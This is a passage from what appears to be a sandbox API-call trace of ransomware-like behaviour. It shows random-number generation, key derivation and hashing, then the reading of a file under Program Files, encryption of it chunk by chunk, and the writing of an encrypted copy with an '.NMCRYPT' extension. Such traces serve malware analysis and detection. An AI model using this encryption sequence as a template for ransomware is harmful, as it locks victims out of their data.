hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.873] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.874] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.875] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.875] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.875] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0166.875] CryptHashData (hHash=0x9ad838, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.875] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad438) returned 1 [0166.875] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0166.875] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0166.875] wcslen (_String="\\\\?\\") returned 0x4 [0166.875] CryptDuplicateKey (in: hKey=0x9ad438, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad5b8) returned 1 [0166.876] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0166.876] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0166.876] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=15195) returned 1 [0166.876] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0166.877] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.878] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.878] GetLastError () returned 0x0 [0166.878] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.879] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.879] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.879] GetLastError () returned 0x0 [0166.879] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.879] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.879] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.879] GetLastError () returned 0x0 [0166.879] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.879] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.879] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.879] GetLastError () returned 0x0 [0166.879] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.879] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.879] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.879] GetLastError () returned 0x0 [0166.879] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.879] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.879] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.879] GetLastError () returned 0x0 [0166.879] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.879] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.880] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.880] GetLastError () returned 0x0 [0166.880] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.880] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.880] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.880] GetLastError () returned 0x0 [0166.880] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.880] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.880] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.880] GetLastError () returned 0x0 [0166.880] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.880] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.880] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.880] GetLastError () returned 0x0 [0166.880] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.880] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.880] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.880] GetLastError () returned 0x0 [0166.880] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.880] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.880] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.880] GetLastError () returned 0x0 [0166.880] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.880] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.880] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.880] GetLastError () returned 0x0 [0166.880] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, 